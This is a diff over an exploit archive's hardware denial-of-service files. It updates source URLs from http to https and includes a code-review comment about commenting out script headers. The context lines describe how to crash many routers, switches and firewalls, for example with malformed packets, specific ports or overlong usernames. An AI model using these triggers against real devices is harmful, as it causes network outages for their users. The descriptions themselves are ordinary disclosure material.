@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/556/info +// source: https://www.securityfocus.com/bid/556/info There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a condition where an ICMP Protocol Problem packet's (ICMP_PARAMPROB) encapsulated IP packet has a random protocol field and certain IP options set. When this specially constructed packet ( [ICMP PARAMPROB][IP with random protocol code and some ip options] ) is sent THROUGH the Gauntlet Firewall (not to the firewall itself), the firewall will hang, looking for the packet in it's transparency tables. diff --git a/exploits/hardware/dos/19477.txt b/exploits/hardware/dos/19477.txt index 41c489f1f..1d8bff9fa 100644 --- a/exploits/hardware/dos/19477.txt +++ b/exploits/hardware/dos/19477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/613/info +source: https://www.securityfocus.com/bid/613/info TFS Gateway 4.0, when configured in a specific non-default manner, is vulnerable to a remotely exploitable denial of service attack. If 'return entire message to sender' is enabled for failed send attempts, and an email is sent to the TFS Gateway with 1: the From: address set to an invalid address on a remote machine and 2: an invalid To: address on the target machine, the gateway will attempt to return the complete message once every 10 seconds until an administrator manually stops it. If enough emails of sufficient size of this nature are sent it can lead to a degradation or denial of service. diff --git a/exploits/hardware/dos/19513.txt b/exploits/hardware/dos/19513.txt index 3a2972c7c..e80dc001c 100644 --- a/exploits/hardware/dos/19513.txt +++ b/exploits/hardware/dos/19513.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/665/info +source: https://www.securityfocus.com/bid/665/info A vulnerability in the Diva LAN ISDN Modem allows remote malicious users to lock up the modem requiring a hard reset. diff --git a/exploits/hardware/dos/19531.txt b/exploits/hardware/dos/19531.txt index 7bd57a40b..ee08678f3 100644 --- a/exploits/hardware/dos/19531.txt +++ b/exploits/hardware/dos/19531.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/675/info +source: https://www.securityfocus.com/bid/675/info Cisco devices running classic IOS are reported prone to a denial of service vulnerability. The issue occurs when a vulnerable device receives and processes a UDP packet on UDP port 514 for syslog. This issue results in a crash or hang requiring a reboot. diff --git a/exploits/hardware/dos/19766.txt b/exploits/hardware/dos/19766.txt index fe575ea72..21235ac2a 100644 --- a/exploits/hardware/dos/19766.txt +++ b/exploits/hardware/dos/19766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1009/info +source: https://www.securityfocus.com/bid/1009/info A vulnerability exists in the Nortel/Bay Networks Nautica Marlin router pruduct. Sending a 0 byte UDP packet to port 161 (SNMP) to one of these routers will cause it to crash. This attack can be trivially performed using NMAP or other UDP port scanner. diff --git a/exploits/hardware/dos/19919.c b/exploits/hardware/dos/19919.c index 1074613ef..7979537f1 100644 --- a/exploits/hardware/dos/19919.c +++ b/exploits/hardware/dos/19919.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1211/info +// source: https://www.securityfocus.com/bid/1211/info Opening approximately 98 connections on port 23 will cause Cisco 760 Series Routers to self reboot. Continuously repeating this action will result in a denial of service attack. diff --git a/exploits/hardware/dos/19923.txt b/exploits/hardware/dos/19923.txt index a39d6c4c6..56dbd303c 100644 --- a/exploits/hardware/dos/19923.txt 
+++ b/exploits/hardware/dos/19923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1219/info +source: https://www.securityfocus.com/bid/1219/info Large usernames or passwords sent to the router's HTTP interface restart the router. Router log will show "restart not in response to admin command" diff --git a/exploits/hardware/dos/20050.c b/exploits/hardware/dos/20050.c index cb4cdffe8..f0ca86200 100644 --- a/exploits/hardware/dos/20050.c +++ b/exploits/hardware/dos/20050.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1419/info +// source: https://www.securityfocus.com/bid/1419/info If Checkpoint Firewall-1 receives a number of spoofed UDP packets with Source IP = Destination IP, the firewall (and likely the machine hosting it) crashes. diff --git a/exploits/hardware/dos/20090.txt b/exploits/hardware/dos/20090.txt index d5fc04d0a..a3795f5be 100644 --- a/exploits/hardware/dos/20090.txt +++ b/exploits/hardware/dos/20090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1491/info +source: https://www.securityfocus.com/bid/1491/info HP JetDirect firmware is vulnerable to a Denial of Service attack. JetDirect devices have an FTP service which fails to properly handle bad FTP commands sent with the ftp "quote" command. This causes the device to stop responding and possibly display an error message. Powering the device off and on is required to regain normal functionality. diff --git a/exploits/hardware/dos/20323.txt b/exploits/hardware/dos/20323.txt index b4d1248ef..6b96d9340 100644 --- a/exploits/hardware/dos/20323.txt +++ b/exploits/hardware/dos/20323.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1838/info +source: https://www.securityfocus.com/bid/1838/info Cisco devices running IOS software may be prone to a denial of service attack if a URL containing a question mark followed by a slash (?/) is requested. The device will enter an infinite loop when supplied with a URL containing a "?/" and an enable password. Subsequently, the router will crash in two minutes after the watchdog timer has expired and will then reload. In certain cases, the device will not reload and a restart would be required in order to regain normal functionality. diff --git a/exploits/hardware/dos/20328.txt b/exploits/hardware/dos/20328.txt index f3875e4a5..2a1ecf7b2 100644 --- a/exploits/hardware/dos/20328.txt +++ b/exploits/hardware/dos/20328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1844/info +source: https://www.securityfocus.com/bid/1844/info A buffer overflow exists in the Intel InBusiness eMail Station, a dedicated email device. When attempting to establish a connection, the username submitted to the device is not properly filtered for length. By supplying a string for USER of approximately 620 characters in length, it is possible for a remote attacker to overflow the relevant buffer. The device will halt in response, requiring the unit to be powered down and restarted. In addition to this denial of service, an attacker sufficiently familiar with the hardware architecture and firmware of this platform may, potentially, be able to exploit this overflow to place malicious machine code on the stack, permitting interference with or modification of the device's software, interception of messages, or another compromise of the unit's normal function. diff --git a/exploits/hardware/dos/20331.c b/exploits/hardware/dos/20331.c index 476686032..7f33f377a 100644 --- a/exploits/hardware/dos/20331.c +++ b/exploits/hardware/dos/20331.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1855/info +source: https://www.securityfocus.com/bid/1855/info A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. diff --git a/exploits/hardware/dos/20332.pl b/exploits/hardware/dos/20332.pl index eff1b7e88..07528cfde 100755 --- a/exploits/hardware/dos/20332.pl +++ b/exploits/hardware/dos/20332.pl @@ -1,5 +1,5 @@ # -#source: http://www.securityfocus.com/bid/1855/info +#source: https://www.securityfocus.com/bid/1855/info # #A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 #or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. # diff --git a/exploits/hardware/dos/20473.pl b/exploits/hardware/dos/20473.pl index c96148466..f857a3bb0 100755 --- a/exploits/hardware/dos/20473.pl +++ b/exploits/hardware/dos/20473.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2072/info +source: https://www.securityfocus.com/bid/2072/info Cisco Catalyst is a high speed switch implemented in local area networks. diff --git a/exploits/hardware/dos/20487.pl b/exploits/hardware/dos/20487.pl index 97c9361bc..6ee00365e 100755 --- a/exploits/hardware/dos/20487.pl +++ b/exploits/hardware/dos/20487.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2082/info +source: https://www.securityfocus.com/bid/2082/info The SOHO 2.2 is a popular SOHO firewall by Watchguard Technologies Inc. diff --git a/exploits/hardware/dos/20509.pl b/exploits/hardware/dos/20509.pl index e96a6b96d..810c1735c 100755 --- a/exploits/hardware/dos/20509.pl +++ b/exploits/hardware/dos/20509.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2117/info +source: https://www.securityfocus.com/bid/2117/info Software versions 6.1(1), 6.1(1a) and 6.1(1b) for Catalyst 4000, 5000, and 6000 devices that support SSH and 3 DES encryption contain a vulnerability that may allow an attacker to cause a denial of service. diff --git a/exploits/hardware/dos/20644.c b/exploits/hardware/dos/20644.c index b20d2f04c..b485d65d5 100644 --- a/exploits/hardware/dos/20644.c +++ b/exploits/hardware/dos/20644.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2400/info +// source: https://www.securityfocus.com/bid/2400/info ASX-1000 Switches are hardware packages developed by Marconi Corporation. ASX-1000 Switches can be used to regulate ATM networks, performing layer-3 switching. diff --git a/exploits/hardware/dos/20654.pl b/exploits/hardware/dos/20654.pl index c2f22f7a5..683e48f00 100755 --- a/exploits/hardware/dos/20654.pl +++ b/exploits/hardware/dos/20654.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2430/info +source: https://www.securityfocus.com/bid/2430/info Symmetra is an Uninterruptable Power Supply manufactured by American Power Conversation Corporation (APC). Symmetra supports network options that allow a remote administrator to access the system via telnet, and gather information from the power supply via SNMP. diff --git a/exploits/hardware/dos/20734.sh b/exploits/hardware/dos/20734.sh index cb0c3f7b3..ff59c49f0 100755 --- a/exploits/hardware/dos/20734.sh +++ b/exploits/hardware/dos/20734.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2551/info +source: https://www.securityfocus.com/bid/2551/info PIX is an enterprise firewall engineered and maintained by Cisco Systems. It is designed to provide robust features and multiple methods of access control and filtering. diff --git a/exploits/hardware/dos/20821.txt b/exploits/hardware/dos/20821.txt index 6f871c794..264a172c4 100644 --- a/exploits/hardware/dos/20821.txt 
+++ b/exploits/hardware/dos/20821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2684/info +source: https://www.securityfocus.com/bid/2684/info Hot Standby Routing Protocol is an Internet Protocol based routing protocol implemented by Cisco Systems. It is designed to offer traffic rerouting services to networks when one router within a pool ceases to operate, and users of the network segment aren't using ICMP Router Discovery Protocol to find the new router handling traffic for their segment. diff --git a/exploits/hardware/dos/20824.txt b/exploits/hardware/dos/20824.txt index a02885483..899283de1 100644 --- a/exploits/hardware/dos/20824.txt +++ b/exploits/hardware/dos/20824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2689/info +source: https://www.securityfocus.com/bid/2689/info The Catalyst series switch is a scalable, high performance layers 2 and 3 switch manufactured by Cisco Systems. The Catalyst series ranges in size, and is designed for use in organizations sized from small business to large enterprise. diff --git a/exploits/hardware/dos/20847.c b/exploits/hardware/dos/20847.c index 1268b9fcd..78fe62d8b 100644 --- a/exploits/hardware/dos/20847.c +++ b/exploits/hardware/dos/20847.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2721/info +// source: https://www.securityfocus.com/bid/2721/info OfficeConnect 812 is a DSL router manufactured by 3Com, and distributed by numerous DSL providers. OfficeConnect 812 is an integrated ADSL router with an onboard 4 port switch. diff --git a/exploits/hardware/dos/21028.pl b/exploits/hardware/dos/21028.pl index 1045027b8..835690480 100755 --- a/exploits/hardware/dos/21028.pl +++ b/exploits/hardware/dos/21028.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3096/info +source: https://www.securityfocus.com/bid/3096/info A potential denial of service condition may exist in Cisco's IOS firmware. 
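Review bot: The new first line of exploits/hardware/dos/21028.pl is still a bare `source: https://www.securityfocus.com/bid/3096/info` with no leading `#`, and the description line after it ("A potential denial of service condition may exist in Cisco's IOS firmware.") is also uncommented, in a file whose mode is 100755. The sibling 20332.pl in this patch already carries its header as `#source:` and `#A vulnerability exists ...`. Since the line is being rewritten anyway, prefix the source line and the description with `#` here. The same applies to the other .pl and .sh headers touched in this patch (20473.pl, 20487.pl, 20509.pl, 20654.pl, 20734.sh).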
diff --git a/exploits/hardware/dos/21092.txt b/exploits/hardware/dos/21092.txt index 74caa4435..875e1de2b 100644 --- a/exploits/hardware/dos/21092.txt +++ b/exploits/hardware/dos/21092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3236/info +source: https://www.securityfocus.com/bid/3236/info CBOS is the Cisco Broadband Operating System, firmware designed for use on Cisco 600 series routers. It is maintained and distributed by Cisco Systems. diff --git a/exploits/hardware/dos/21103.c b/exploits/hardware/dos/21103.c index 432981fad..d656497f4 100644 --- a/exploits/hardware/dos/21103.c +++ b/exploits/hardware/dos/21103.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3306/info +// source: https://www.securityfocus.com/bid/3306/info The DLink Dl-704 is a DSL/Cable router and switch designed for home network use. diff --git a/exploits/hardware/dos/21296.c b/exploits/hardware/dos/21296.c index 61cab6048..7a60f6c91 100644 --- a/exploits/hardware/dos/21296.c +++ b/exploits/hardware/dos/21296.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4132/info +// source: https://www.securityfocus.com/bid/4132/info Cisco products contain multiple vulnerabilities in handling of SNMP requests and traps. A general report for multiple vendors was initially published on February 12 (Bugtraq IDs 4088 and 4089), however more information is now available and a separate Bugtraq ID has been allocated for the Cisco Operating Systems and Appliances vulnerabilities. diff --git a/exploits/hardware/dos/21465.txt b/exploits/hardware/dos/21465.txt index 6f5010c85..b600c94be 100644 --- a/exploits/hardware/dos/21465.txt +++ b/exploits/hardware/dos/21465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4786/info +source: https://www.securityfocus.com/bid/4786/info IOS is the Internet Operating System, used on Cisco routers. It is distributed and maintained by Cisco. 
diff --git a/exploits/hardware/dos/21472.pl b/exploits/hardware/dos/21472.pl index 60c43c8ad..e811c184b 100755 --- a/exploits/hardware/dos/21472.pl +++ b/exploits/hardware/dos/21472.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4815/info +source: https://www.securityfocus.com/bid/4815/info Cisco Broadband Operating System (CBOS) is the operating system used on Cisco 600 series routers. diff --git a/exploits/hardware/dos/21561.txt b/exploits/hardware/dos/21561.txt index 3c483d2a7..3c9a0c344 100644 --- a/exploits/hardware/dos/21561.txt +++ b/exploits/hardware/dos/21561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5034/info +source: https://www.securityfocus.com/bid/5034/info ZyXEL 642R routers have difficulties handling certain types of malformed packets. In particular, it is possible to deny services by sending a vulnerable router a SYN-ACK packet. To a lesser degree, the router also encounters difficulties when handling SYN-FIN packets. In both instances, some services provided by the router (telnet, FTP and DHCP) will be denied, however, the device will continue to route network traffic. This issue has also been reproduced with other types of malformed packets. diff --git a/exploits/hardware/dos/21637.c b/exploits/hardware/dos/21637.c index 335654c63..5779abfe7 100644 --- a/exploits/hardware/dos/21637.c +++ b/exploits/hardware/dos/21637.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5292/info +// source: https://www.securityfocus.com/bid/5292/info ZyXEL 642R and Prestige 310 routers have difficulties handling IP packets that are malformed. Reportedly, when ZyXEL routers receive a single specially malformed packet, they stop responding for exactly 30 seconds. diff --git a/exploits/hardware/dos/21655.c b/exploits/hardware/dos/21655.c index 1790b7d7f..18f0e96a5 100644 --- a/exploits/hardware/dos/21655.c +++ b/exploits/hardware/dos/21655.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5328/info +// source: https://www.securityfocus.com/bid/5328/info A problem has been discovered in Cisco IOS and MGX switches that could result in a denial of service, and potential code execution. diff --git a/exploits/hardware/dos/21656.txt b/exploits/hardware/dos/21656.txt index 02df2a58a..cafcdfa5e 100644 --- a/exploits/hardware/dos/21656.txt +++ b/exploits/hardware/dos/21656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5333/info +source: https://www.securityfocus.com/bid/5333/info The Lucent Access Point series of routers support a web based administrative interface. An error has been reported in the embedded HTTP server. diff --git a/exploits/hardware/dos/21657.txt b/exploits/hardware/dos/21657.txt index 4ceb6066d..6865af545 100644 --- a/exploits/hardware/dos/21657.txt +++ b/exploits/hardware/dos/21657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5336/info +source: https://www.securityfocus.com/bid/5336/info An issue has been reported with the HP ProCurve 4000M Switch. diff --git a/exploits/hardware/dos/21736.txt b/exploits/hardware/dos/21736.txt index e079ae68f..a1f8ed254 100644 --- a/exploits/hardware/dos/21736.txt +++ b/exploits/hardware/dos/21736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5550/info +source: https://www.securityfocus.com/bid/5550/info The LR series WAN routers are hardware and firmware solutions manufactured and distributed by LG Electronics. diff --git a/exploits/hardware/dos/21756.txt b/exploits/hardware/dos/21756.txt index 1cd26e2bc..0b1d656b8 100644 --- a/exploits/hardware/dos/21756.txt +++ b/exploits/hardware/dos/21756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5571/info +source: https://www.securityfocus.com/bid/5571/info A denial of service vulnerability has been reported in the Belkin F5D6130 Wireless Network Access Point. 
diff --git a/exploits/hardware/dos/21770.c b/exploits/hardware/dos/21770.c index 1bf2538f0..f0b2c83d9 100644 --- a/exploits/hardware/dos/21770.c +++ b/exploits/hardware/dos/21770.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5620/info +// source: https://www.securityfocus.com/bid/5620/info Cisco VPN 3000 series concentrators are prone to a denial of service condition when receiving an overly long username string during authentication from a VPN client. diff --git a/exploits/hardware/dos/21791.txt b/exploits/hardware/dos/21791.txt index c2adcfd86..fef6c21b0 100644 --- a/exploits/hardware/dos/21791.txt +++ b/exploits/hardware/dos/21791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5703/info +source: https://www.securityfocus.com/bid/5703/info The SSR8000 is a SmartSwitch distributed and maintained by Enterasys. diff --git a/exploits/hardware/dos/21828.txt b/exploits/hardware/dos/21828.txt index 1d8e606ad..26c188c47 100644 --- a/exploits/hardware/dos/21828.txt +++ b/exploits/hardware/dos/21828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5784/info +source: https://www.securityfocus.com/bid/5784/info When multiple Procurve switches are used interconnected, it is common for an administrator to enable a feature allowing each switch to be viewed through a single interface, accessible via the web. diff --git a/exploits/hardware/dos/21939.txt b/exploits/hardware/dos/21939.txt index e4455a335..52a917267 100644 --- a/exploits/hardware/dos/21939.txt +++ b/exploits/hardware/dos/21939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5962/info +source: https://www.securityfocus.com/bid/5962/info Polycom ViaVideo devices are prone to a denial of service condition upon receipt of numerous incomplete HTTP requests. This may restrict availability of the device for legitimate users. diff --git a/exploits/hardware/dos/21971.txt b/exploits/hardware/dos/21971.txt index 0690c7a80..8bab57871 100644 
--- a/exploits/hardware/dos/21971.txt +++ b/exploits/hardware/dos/21971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6059/info +source: https://www.securityfocus.com/bid/6059/info The Cisco AS5350 Universal Gateway is reported to be prone to a denial of service condition. It is possible to cause this condition by portscanning a vulnerable device. diff --git a/exploits/hardware/dos/21975.txt b/exploits/hardware/dos/21975.txt index 1dcf8b809..a7515d024 100644 --- a/exploits/hardware/dos/21975.txt +++ b/exploits/hardware/dos/21975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6086/info +source: https://www.securityfocus.com/bid/6086/info Linksys BEFSR41 is vulnerable to a denial of service condition. diff --git a/exploits/hardware/dos/21978.txt b/exploits/hardware/dos/21978.txt index eacc85747..b72fbfc14 100644 --- a/exploits/hardware/dos/21978.txt +++ b/exploits/hardware/dos/21978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6090/info +source: https://www.securityfocus.com/bid/6090/info A denial of service vulnerability has been reported for several networking devices. diff --git a/exploits/hardware/dos/22060.txt b/exploits/hardware/dos/22060.txt index 071c8e7ae..969c7d37b 100644 --- a/exploits/hardware/dos/22060.txt +++ b/exploits/hardware/dos/22060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6297/info +source: https://www.securityfocus.com/bid/6297/info It has been reported that the ftpd server, included in the Embedded Real Time Operating System (ERTOS) of 3Com Superstack 3 NBX IP phones, contains a denial of service vulnerability. This issue can be triggered by sending a CEL paramater of excessive length, effectively causing the ftpd server and various VoIP services to no longer respond. diff --git a/exploits/hardware/dos/22062.py b/exploits/hardware/dos/22062.py index 79fb31379..de6c349da 100755 --- a/exploits/hardware/dos/22062.py +++ b/exploits/hardware/dos/22062.py 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6301/info +source: https://www.securityfocus.com/bid/6301/info Several Linksys Broadband Router devices are prone to a buffer overflow conditions. diff --git a/exploits/hardware/dos/22407.txt b/exploits/hardware/dos/22407.txt index f37fd6b4e..69cc3507d 100644 --- a/exploits/hardware/dos/22407.txt +++ b/exploits/hardware/dos/22407.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7166/info +source: https://www.securityfocus.com/bid/7166/info It has been reported that some ProSafe VPN Firewall devices do not properly handle some types of input. Because of this, a remote user could potentially send malicious input to the device that would result in a crash, and potential denial of service. diff --git a/exploits/hardware/dos/22415.c b/exploits/hardware/dos/22415.c index 93fad67c5..6b7d2570b 100644 --- a/exploits/hardware/dos/22415.c +++ b/exploits/hardware/dos/22415.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7175/info +// source: https://www.securityfocus.com/bid/7175/info vulnerability has been reported in the 3Com SuperStack II RAS 1500 router. The problem occurs when processing network packets containing malicious IP headers. When received, the packet may cause the router to crash. diff --git a/exploits/hardware/dos/22440.c b/exploits/hardware/dos/22440.c index 633a975b0..2b6123ceb 100644 --- a/exploits/hardware/dos/22440.c +++ b/exploits/hardware/dos/22440.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7219/info +source: https://www.securityfocus.com/bid/7219/info It has been reported that the implementation of the Internet Protocol (IP) in the firmware of the D-Link DI-614+ wireless router is vulnerable to a remotely exploitable denial of service condition. The vulnerability is related to the reassembly of fragmented IP packets and can be triggered by transmission of fragments with malicious size parameters to an affected device. There is existing source code that exploits similar, older vulnerabilities that can be used to successfully exploit this vulnerability. When exploited, the device will reboot instantly. This will result in a denial of service until the device has restarted. */ diff --git a/exploits/hardware/dos/22596.txt b/exploits/hardware/dos/22596.txt index 2bc587c32..50a0ecbfb 100644 --- a/exploits/hardware/dos/22596.txt +++ b/exploits/hardware/dos/22596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7575/info +source: https://www.securityfocus.com/bid/7575/info It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. diff --git a/exploits/hardware/dos/22647.txt b/exploits/hardware/dos/22647.txt index 81e0fdcdf..87f6aac9a 100644 --- a/exploits/hardware/dos/22647.txt +++ b/exploits/hardware/dos/22647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7686/info +source: https://www.securityfocus.com/bid/7686/info D-Link DI-704P has been reported prone to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/22797.txt b/exploits/hardware/dos/22797.txt index 7a85ba01a..efdf46e9c 100644 --- a/exploits/hardware/dos/22797.txt +++ b/exploits/hardware/dos/22797.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7961/info +source: https://www.securityfocus.com/bid/7961/info It has been reported that Cajun switches do not properly handle traffic to port 4000. Because of this, an attacker may be able to cause the switch to stall for period of time. diff --git a/exploits/hardware/dos/22876.txt b/exploits/hardware/dos/22876.txt index d540aacbd..8722b79c1 100644 --- a/exploits/hardware/dos/22876.txt +++ b/exploits/hardware/dos/22876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8121/info +source: https://www.securityfocus.com/bid/8121/info A problem in the Canon GP-300 has been reported in the handling of some types of malformed web requests. This issue could result in the denial of service to legitmate users of the print server. diff --git a/exploits/hardware/dos/22947.c b/exploits/hardware/dos/22947.c index bd572725f..1b8eef675 100644 --- a/exploits/hardware/dos/22947.c +++ b/exploits/hardware/dos/22947.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8248/info +// source: https://www.securityfocus.com/bid/8248/info A problem in the 3Com 812 OfficeConnect has been reported that may result in the router becoming unstable. Because of this, an attacker may be able to deny service to legitimate users of the vulnerable router by submitting an excessively long request. @@ -7,7 +7,7 @@ A problem in the 3Com 812 OfficeConnect has been reported that may result in the * PoC DoS exploit for 3Com OfficeConnect DSL Routers. This PoC exploit the * vulnerability documented at: -, +, * discovered by David F. Madrid. * * Successful exploitation of the vulnerability should diff --git a/exploits/hardware/dos/22950.txt b/exploits/hardware/dos/22950.txt index e60420613..fb71409b0 100644 --- a/exploits/hardware/dos/22950.txt +++ b/exploits/hardware/dos/22950.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8252/info +source: https://www.securityfocus.com/bid/8252/info A problem has been reported in the handling of requests of excessive length placed to the service on port 280 by the Xavi X7028r DSL router. This may allow an attacker to crash a vulnerable router. diff --git a/exploits/hardware/dos/22962.pl b/exploits/hardware/dos/22962.pl index 7384bff9b..2aaace751 100755 --- a/exploits/hardware/dos/22962.pl +++ b/exploits/hardware/dos/22962.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8290/info +source: https://www.securityfocus.com/bid/8290/info Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload. diff --git a/exploits/hardware/dos/22978.txt b/exploits/hardware/dos/22978.txt index 6f49ab339..aa5974d14 100644 --- a/exploits/hardware/dos/22978.txt +++ b/exploits/hardware/dos/22978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8323/info +source: https://www.securityfocus.com/bid/8323/info It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory. diff --git a/exploits/hardware/dos/22983.txt b/exploits/hardware/dos/22983.txt index bd1baf3f9..8e4c523d7 100644 --- a/exploits/hardware/dos/22983.txt +++ b/exploits/hardware/dos/22983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8336/info +source: https://www.securityfocus.com/bid/8336/info The Compaq Management Agent HTTP server is vulnerable to a format string issue. A remote attacker may be able to exploit this vulnerability in order to execute arbitrary code with Local System privileges. diff --git a/exploits/hardware/dos/22991.txt b/exploits/hardware/dos/22991.txt index 8a27a71bc..d2011abc0 100644 --- a/exploits/hardware/dos/22991.txt 
+++ b/exploits/hardware/dos/22991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8355/info +source: https://www.securityfocus.com/bid/8355/info D-Link DI-704P has been reported prone to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/23087.c b/exploits/hardware/dos/23087.c index a4f641dd1..380432686 100644 --- a/exploits/hardware/dos/23087.c +++ b/exploits/hardware/dos/23087.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8524/info +// source: https://www.securityfocus.com/bid/8524/info An information leakage issue has been discovered in Check Point Firewall-1. Because of this, an attacker may gain sensitive information about network resources. diff --git a/exploits/hardware/dos/23190.pl b/exploits/hardware/dos/23190.pl index 1699cdd7a..0ea4b2aba 100755 --- a/exploits/hardware/dos/23190.pl +++ b/exploits/hardware/dos/23190.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8711/info +source: https://www.securityfocus.com/bid/8711/info A denial of service has been reported in the SMC SMC2404WBR BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL Broadband Router. It is possible to trigger this condition by sending UDP packets randomly to ports 0-65000. diff --git a/exploits/hardware/dos/23394.c b/exploits/hardware/dos/23394.c index ce97ad722..a44421556 100644 --- a/exploits/hardware/dos/23394.c +++ b/exploits/hardware/dos/23394.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9091/info +// source: https://www.securityfocus.com/bid/9091/info A problem has been identified in Thomson Cable Modems when handling long requests on the HTTP port. Because of this, it may be possible for an attacker to deny service to legitimate users of the device. diff --git a/exploits/hardware/dos/23508.txt b/exploits/hardware/dos/23508.txt index 3cefe4c55..230b99037 100644 --- a/exploits/hardware/dos/23508.txt +++ b/exploits/hardware/dos/23508.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9339/info +source: https://www.securityfocus.com/bid/9339/info A problem has been identified in the YaSoft Switch Off software package when handling large packets via the service management port (8000/TCP). This may make it possible for a remote user to deny service to legitimate users of the service. diff --git a/exploits/hardware/dos/23638.pl b/exploits/hardware/dos/23638.pl index 055d3eec1..42015e582 100755 --- a/exploits/hardware/dos/23638.pl +++ b/exploits/hardware/dos/23638.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9562/info +source: https://www.securityfocus.com/bid/9562/info A problem has been identified in the handling of specific types of traffic by Cisco 6000, 6500, and 7600 routers with the MSFC2 device. Because of this, an attacker could potentially crash a vulnerable system. diff --git a/exploits/hardware/dos/23672.txt b/exploits/hardware/dos/23672.txt index bbbc5065b..d56ea3818 100644 --- a/exploits/hardware/dos/23672.txt +++ b/exploits/hardware/dos/23672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9618/info +source: https://www.securityfocus.com/bid/9618/info Problems in various abilities have been identified in the Red-M Red-Alert network monitors. Because of this issues, an attacker may be able to crash a vulnerable device and eliminate logs, gain unauthorized access to the administrative interface, or partially evade detection by an affected device. diff --git a/exploits/hardware/dos/23778.c b/exploits/hardware/dos/23778.c index a0935a487..89890ca29 100644 --- a/exploits/hardware/dos/23778.c +++ b/exploits/hardware/dos/23778.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9779/info +// source: 